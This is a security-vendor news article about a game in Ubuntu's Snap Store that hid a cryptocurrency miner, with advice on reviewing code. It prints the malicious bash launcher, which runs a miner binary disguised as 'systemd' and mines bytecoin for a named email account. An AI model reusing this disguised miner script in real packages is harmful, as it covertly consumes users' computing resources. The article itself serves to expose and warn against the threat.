Your browser is obsolete!

The page may not load correctly.

Unexpected guests

Незваные гости

Other issues in this category (50)
  • add to favourites
    Add to Bookmarks

"My first Ferrari"

Read: 196 Comments: 3 Rating: 7

Encryption ransomware programs for Linux are hardly news to us. After all, it was Doctor Web who discovered the first one. And there exist legitimate mining applications for Linux too. Naturally, criminals are riding the trend, trying to make money off of ordinary Linux users.

Ubuntu recently introduced its snap package format, and that gave rise to an official applications catalogue similar to Windows Store and other software portals. All of that was meant to make it easier to use the system. But apparently no one was going to review packages uploaded to the store.

However, a vigilant user discovered within the code of a game a cryptocurrency miner and a script facilitating its auto start.

Thanks to the nature of open source, the malicious intentions of any application can be revealed in an instant. And it looked like this:


#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

https://github.com/canonical-websites/snapcraft.io/issues/651

But for some reason, it remained unnoticed for quite some time. Moreover, similar miners and scripts were spotted in other applications from the same author. The malicious code mined bytecoins for a user whose email address suggested that he wanted to generate enough funds to buy a Ferrari (note the address in line 8 of the code above). The Ubuntu Snap Store doesn't use a download counter, so there is no way to tell whether the perpetrator managed to have his dreams fulfilled before being busted.

#Linux #games #mining

Dr.Web recommends

  1. Maintain your vigilance—even with Linux. Even though anyone can examine open source code, that doesn't at all mean everyone is doing that. Experience shows that people usually expect someone else to do that; meanwhile malicious code or a vulnerability is finding its way onto multiple desktops and servers.
  2. Review the code of every application you're going to download and install, or use an anti-virus. Don't leave your system to the mercy of attackers!

Rate this issue and receive Dr.Weblings! (1 vote = 1 Dr.Webling)

Sign in and get 10 Dr.Weblings for sharing the link to this issue via social media.

[Twitter]

Unfortunately, due to Facebook's technical limitations, Dr.Weblings cannot be awarded. However, you can share this link with your friends for free.

Tell us what you think

Leave your comment on the day of publication and get 10 Dr.Weblings, or get 1 Dr.Webling for a comment posted any other day. Comments are published automatically and are reviewed by a moderator. Rules for leaving comments about Doctor Web news items.

To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.

Comments